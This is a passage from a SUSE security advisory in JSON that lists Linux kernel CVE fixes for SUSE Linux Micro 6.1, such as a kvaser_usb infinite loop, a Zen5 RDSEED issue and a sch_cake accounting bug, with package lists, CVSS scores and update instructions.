"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: kvaser_usb: leaf: Fix potential infinite loop in command parsers\n\nThe `kvaser_usb_leaf_wait_cmd()` and `kvaser_usb_leaf_read_bulk_callback`\nfunctions contain logic to zero-length commands. These commands are used\nto align data to the USB endpoint\u0027s wMaxPacketSize boundary.\n\nThe driver attempts to skip these placeholders by aligning the buffer\nposition `pos` to the next packet boundary using `round_up()` function.\n\nHowever, if zero-length command is found exactly on a packet boundary\n(i.e., `pos` is a multiple of wMaxPacketSize, including 0), `round_up`\nfunction will return the unchanged value of `pos`. This prevents `pos`\nto be increased, causing an infinite loop in the parsing logic.\n\nThis patch fixes this in the function by using `pos + 1` instead.\nThis ensures that even if `pos` is on a boundary, the calculation is\nbased on `pos + 1`, forcing `round_up()` to always return the next\naligned boundary.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68308",
"url": "https://www.suse.com/security/cve/CVE-2025-68308"
},
{
"category": "external",
"summary": "SUSE Bug 1255149 for CVE-2025-68308",
"url": "https://bugzilla.suse.com/1255149"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68308"
},
{
"cve": "CVE-2025-68312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: Prevents free active kevent\n\nThe root cause of this issue are:\n1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0);\nput the kevent work in global workqueue. However, the kevent has not yet\nbeen scheduled when the usbnet device is unregistered. Therefore, executing\nfree_netdev() results in the \"free active object (kevent)\" error reported\nhere.\n\n2. Another factor is that when calling usbnet_disconnect()-\u003eunregister_netdev(),\nif the usbnet device is up, ndo_stop() is executed to cancel the kevent.\nHowever, because the device is not up, ndo_stop() is not executed.\n\nThe solution to this problem is to cancel the kevent before executing\nfree_netdev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68312",
"url": "https://www.suse.com/security/cve/CVE-2025-68312"
},
{
"category": "external",
"summary": "SUSE Bug 1255171 for CVE-2025-68312",
"url": "https://bugzilla.suse.com/1255171"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68312"
},
{
"cve": "CVE-2025-68313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add RDSEED fix for Zen5\n\nThere\u0027s an issue with RDSEED\u0027s 16-bit and 32-bit register output\nvariants on Zen5 which return a random value of 0 \"at a rate inconsistent\nwith randomness while incorrectly signaling success (CF=1)\". Search the\nweb for AMD-SB-7055 for more detail.\n\nAdd a fix glue which checks microcode revisions.\n\n [ bp: Add microcode revisions checking, rewrite. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68313",
"url": "https://www.suse.com/security/cve/CVE-2025-68313"
},
{
"category": "external",
"summary": "SUSE Bug 1255415 for CVE-2025-68313",
"url": "https://bugzilla.suse.com/1255415"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68313"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
